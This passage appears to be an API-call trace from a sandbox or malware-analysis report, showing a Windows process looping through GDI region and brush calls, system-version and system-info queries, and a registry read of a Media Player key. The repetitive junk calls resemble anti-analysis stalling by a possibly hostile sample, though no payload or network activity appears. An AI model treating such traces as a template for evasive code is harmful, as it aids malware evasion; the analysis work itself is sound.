lpRect=0x18179c) returned 0 [0017.672] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.672] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.672] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.672] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbe040713 [0017.672] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb404027d [0017.672] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bf2 [0017.672] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bf3 [0017.672] CombineRgn (hrgnDst=0x1040bf2, hrgnSrc1=0xbe040713, hrgnSrc2=0xb404027d, iMode=1) returned 1 [0017.672] CombineRgn (hrgnDst=0x1040bf3, hrgnSrc1=0xbe040713, hrgnSrc2=0xb404027d, iMode=4) returned 2 [0017.672] CreateSolidBrush (color=0xff) returned 0x2100bf1 [0017.672] CreateSolidBrush (color=0xff0000) returned 0x1100bf4 [0017.672] DeleteObject (ho=0x1100bf4) returned 1 [0017.672] DeleteObject (ho=0xb404027d) returned 1 [0017.672] DeleteObject (ho=0xbe040713) returned 1 [0017.672] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.672] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.672] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.672] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.672] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.672] BeginPath (hdc=0x0) returned 0 [0017.672] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.672] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.672] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.672] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.672] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.672] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.672] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.672] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.673] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb504027d [0017.673] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbf040713 [0017.673] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bf5 [0017.673] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bf6 [0017.673] CombineRgn (hrgnDst=0x1040bf5, hrgnSrc1=0xb504027d, hrgnSrc2=0xbf040713, iMode=1) returned 1 [0017.673] CombineRgn (hrgnDst=0x1040bf6, hrgnSrc1=0xb504027d, hrgnSrc2=0xbf040713, iMode=4) returned 2 [0017.673] CreateSolidBrush (color=0xff) returned 0x2100bf4 [0017.673] CreateSolidBrush (color=0xff0000) returned 0x1100bf7 [0017.673] DeleteObject (ho=0x1100bf7) returned 1 [0017.673] DeleteObject (ho=0xbf040713) returned 1 [0017.673] DeleteObject (ho=0xb504027d) returned 1 [0017.673] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.673] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.673] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.673] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.673] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.673] BeginPath (hdc=0x0) returned 0 [0017.673] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.673] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.673] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.673] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.673] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.673] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.673] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.673] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.673] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc0040713 [0017.674] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb604027d [0017.674] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bf8 [0017.674] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bf9 [0017.674] CombineRgn (hrgnDst=0x1040bf8, hrgnSrc1=0xc0040713, hrgnSrc2=0xb604027d, iMode=1) returned 1 [0017.674] CombineRgn (hrgnDst=0x1040bf9, hrgnSrc1=0xc0040713, hrgnSrc2=0xb604027d, iMode=4) returned 2 [0017.674] CreateSolidBrush (color=0xff) returned 0x2100bf7 [0017.674] CreateSolidBrush (color=0xff0000) returned 0x1100bfa [0017.674] DeleteObject (ho=0x1100bfa) returned 1 [0017.674] DeleteObject (ho=0xb604027d) returned 1 [0017.674] DeleteObject (ho=0xc0040713) returned 1 [0017.674] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.674] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.674] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.674] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.674] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.674] BeginPath (hdc=0x0) returned 0 [0017.674] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.674] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.674] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.674] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.674] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.674] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.674] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.674] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.674] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb704027d [0017.674] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc1040713 [0017.674] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bfb [0017.674] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bfc [0017.674] CombineRgn (hrgnDst=0x1040bfb, hrgnSrc1=0xb704027d, hrgnSrc2=0xc1040713, iMode=1) returned 1 [0017.674] CombineRgn (hrgnDst=0x1040bfc, hrgnSrc1=0xb704027d, hrgnSrc2=0xc1040713, iMode=4) returned 2 [0017.675] CreateSolidBrush (color=0xff) returned 0x2100bfa [0017.675] CreateSolidBrush (color=0xff0000) returned 0x1100bfd [0017.675] DeleteObject (ho=0x1100bfd) returned 1 [0017.675] DeleteObject (ho=0xc1040713) returned 1 [0017.675] DeleteObject (ho=0xb704027d) returned 1 [0017.675] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.675] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.675] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.675] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.675] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.675] BeginPath (hdc=0x0) returned 0 [0017.675] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.675] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.675] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.675] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.675] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.675] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.675] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.675] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.675] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc2040713 [0017.675] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb804027d [0017.675] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bfe [0017.675] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bff [0017.675] CombineRgn (hrgnDst=0x1040bfe, hrgnSrc1=0xc2040713, hrgnSrc2=0xb804027d, iMode=1) returned 1 [0017.675] CombineRgn (hrgnDst=0x1040bff, hrgnSrc1=0xc2040713, hrgnSrc2=0xb804027d, iMode=4) returned 2 [0017.675] CreateSolidBrush (color=0xff) returned 0x2100bfd [0017.675] CreateSolidBrush (color=0xff0000) returned 0x1100c00 [0017.675] DeleteObject (ho=0x1100c00) returned 1 [0017.675] DeleteObject (ho=0xb804027d) returned 1 [0017.676] DeleteObject (ho=0xc2040713) returned 1 [0017.676] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.676] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.676] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.676] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.676] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.676] BeginPath (hdc=0x0) returned 0 [0017.676] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.676] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.676] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.676] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.676] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.676] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.676] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.676] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.676] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb904027d [0017.676] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc3040713 [0017.676] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c01 [0017.676] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c02 [0017.676] CombineRgn (hrgnDst=0x1040c01, hrgnSrc1=0xb904027d, hrgnSrc2=0xc3040713, iMode=1) returned 1 [0017.676] CombineRgn (hrgnDst=0x1040c02, hrgnSrc1=0xb904027d, hrgnSrc2=0xc3040713, iMode=4) returned 2 [0017.676] CreateSolidBrush (color=0xff) returned 0x2100c00 [0017.676] CreateSolidBrush (color=0xff0000) returned 0x1100c03 [0017.676] DeleteObject (ho=0x1100c03) returned 1 [0017.676] DeleteObject (ho=0xc3040713) returned 1 [0017.676] DeleteObject (ho=0xb904027d) returned 1 [0017.676] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.676] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.676] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.677] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.677] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.677] BeginPath (hdc=0x0) returned 0 [0017.677] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.677] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.677] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.677] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.677] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.677] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.677] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.677] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.677] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc4040713 [0017.677] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xba04027d [0017.677] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c04 [0017.677] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c05 [0017.677] CombineRgn (hrgnDst=0x1040c04, hrgnSrc1=0xc4040713, hrgnSrc2=0xba04027d, iMode=1) returned 1 [0017.677] CombineRgn (hrgnDst=0x1040c05, hrgnSrc1=0xc4040713, hrgnSrc2=0xba04027d, iMode=4) returned 2 [0017.677] CreateSolidBrush (color=0xff) returned 0x2100c03 [0017.677] CreateSolidBrush (color=0xff0000) returned 0x1100c06 [0017.677] DeleteObject (ho=0x1100c06) returned 1 [0017.677] DeleteObject (ho=0xba04027d) returned 1 [0017.677] DeleteObject (ho=0xc4040713) returned 1 [0017.677] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.677] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.677] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.677] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.677] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.678] BeginPath (hdc=0x0) returned 0 [0017.678] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.678] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.678] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.678] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.678] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.678] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.678] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.678] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.678] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbb04027d [0017.678] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc5040713 [0017.678] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c07 [0017.678] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c08 [0017.678] CombineRgn (hrgnDst=0x1040c07, hrgnSrc1=0xbb04027d, hrgnSrc2=0xc5040713, iMode=1) returned 1 [0017.678] CombineRgn (hrgnDst=0x1040c08, hrgnSrc1=0xbb04027d, hrgnSrc2=0xc5040713, iMode=4) returned 2 [0017.678] CreateSolidBrush (color=0xff) returned 0x2100c06 [0017.678] CreateSolidBrush (color=0xff0000) returned 0x1100c09 [0017.678] DeleteObject (ho=0x1100c09) returned 1 [0017.678] DeleteObject (ho=0xc5040713) returned 1 [0017.678] DeleteObject (ho=0xbb04027d) returned 1 [0017.678] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.678] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.678] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.678] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.678] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.678] BeginPath (hdc=0x0) returned 0 [0017.678] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.678] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.678] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.678] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.678] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.678] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.679] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.679] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.679] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc6040713 [0017.679] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xbc04027d [0017.679] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c0a [0017.679] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c0b [0017.679] CombineRgn (hrgnDst=0x1040c0a, hrgnSrc1=0xc6040713, hrgnSrc2=0xbc04027d, iMode=1) returned 1 [0017.679] CombineRgn (hrgnDst=0x1040c0b, hrgnSrc1=0xc6040713, hrgnSrc2=0xbc04027d, iMode=4) returned 2 [0017.679] CreateSolidBrush (color=0xff) returned 0x2100c09 [0017.679] CreateSolidBrush (color=0xff0000) returned 0x1100c0c [0017.679] DeleteObject (ho=0x1100c0c) returned 1 [0017.679] DeleteObject (ho=0xbc04027d) returned 1 [0017.679] DeleteObject (ho=0xc6040713) returned 1 [0017.679] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.679] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.679] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.679] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.679] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.679] BeginPath (hdc=0x0) returned 0 [0017.679] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.679] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.679] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.679] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.679] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.679] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.679] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.679] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.680] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xbd04027d [0017.680] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xc7040713 [0017.680] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c0d [0017.680] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040c0e [0017.680] CombineRgn (hrgnDst=0x1040c0d, hrgnSrc1=0xbd04027d, hrgnSrc2=0xc7040713, iMode=1) returned 1 [0017.680] CombineRgn (hrgnDst=0x1040c0e, hrgnSrc1=0xbd04027d, hrgnSrc2=0xc7040713, iMode=4) returned 2 [0017.680] CreateSolidBrush 